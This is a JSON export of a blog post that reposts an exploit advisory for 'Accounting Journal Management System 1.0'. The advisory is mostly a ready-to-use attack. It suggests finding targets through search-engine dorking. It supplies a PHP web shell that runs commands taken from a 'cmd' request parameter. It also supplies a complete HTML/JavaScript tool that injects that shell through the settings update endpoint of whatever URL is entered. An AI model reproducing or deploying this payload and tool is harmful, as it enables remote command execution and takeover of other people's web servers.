{"id":59019,"date":"2024-08-20T19:40:55","date_gmt":"2024-08-20T16:40:55","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/180251\/ajms10-exec.txt"},"modified":"2024-08-20T19:40:55","modified_gmt":"2024-08-20T16:40:55","slug":"accounting-journal-management-system-1-0-code-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/accounting-journal-management-system-1-0-code-injection\/","title":{"rendered":"Accounting Journal Management System 1.0 Code Injection"},"content":{"rendered":"

=============================================================================================================================================
| # Title : Accounting Journal Management System 1.0 php code injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) \/ browser : Mozilla firefox 128.0.3 (64 bits) |
| # Vendor : https:\/\/www.sourcecodester.com\/sites\/default\/files\/download\/oretnom23\/ajms_0_0.zip |
=============================================================================================================================================<\/p>\n

poc :<\/p>\n[+] Dorking \u0130n Google Or Other Search Enggine.<\/p>\n[+] This payload injects code of your choice into an HTML page. <\/p>\n

You give it a name and save it in the root directory of the script. and executes it remotely.<\/p>\n[+] Line 11 : ‘Content[welcome]’ = Replace “welcome” with any label you want.<\/p>\n[+] Line 11 : Replace the payload as you wish = <?php if(isset($_REQUEST[‘cmd’])){ echo “<pre>”; $cmd = ($_REQUEST[‘cmd’]); system($cmd); echo “<\/pre>”; die; }?><\/p>\n[+] save payload as poc.html <\/p>\n[+] Set your target url<\/p>\n[+] payload : <\/p>\n

<!DOCTYPE html>
<html lang=”en”>
<head>
<meta charset=”UTF-8″>
<meta name=”viewport” content=”width=device-width, initial-scale=1.0″>
<title> PHP code injection Tool<\/title>
<script>
async function sendRequest() {
const url = document.getElementById(‘url’).value;
const postData = {
‘content[welcome]’: `<?php if(isset($_REQUEST[‘cmd’])){ echo “<pre>”; $cmd = ($_REQUEST[‘cmd’]); system($cmd); echo “<\/pre>”; die; }?>`
};<\/p>\n

try {
const response = await fetch(`${url}\/classes\/SystemSettings.php?f=update_settings`, {
method: ‘POST’,
headers: {
‘Content-Type’: ‘application\/x-www-form-urlencoded’
},
body: new URLSearchParams(postData).toString()
});<\/p>\n

if (response.ok) {
document.getElementById(‘result’).innerText = ‘[+] Injection in welcome page\\n[+] ‘ + url + ‘\/?cmd=ls -al\\n’;<\/p>\n

} else {
document.getElementById(‘result’).innerText = ‘Error: ‘ + response.statusText;
}
} catch (error) {
document.getElementById(‘result’).innerText = ‘Error making request: ‘ + error.message;
}
}
<\/script>
<\/head>
<body>
<h1>Injection Tool<\/h1>
<form onsubmit=”event.preventDefault(); sendRequest();”>
<label for=”url”>Enter URL:<\/label>
<input type=”text” id=”url” name=”url” required>
<button type=”submit”>Submit<\/button>
<\/form>
<pre id=”result”><\/pre>
<\/body>
<\/html><\/p>\n

Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================<\/p>\n","protected":false},"excerpt":{"rendered":"

=============================================================================================================================================| # Title : Accounting Journal Management System 1.0 php code injection Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) \/ browser : Mozilla firefox 128.0.3 (64 bits) || # Vendor : https:\/\/www.sourcecodester.com\/sites\/default\/files\/download\/oretnom23\/ajms_0_0.zip |============================================================================================================================================= poc : [+] Dorking \u0130n Google Or Other Search Enggine. [+] This payload injects code …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59019","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59019","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59019"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59019\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59019"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59019"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59019"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}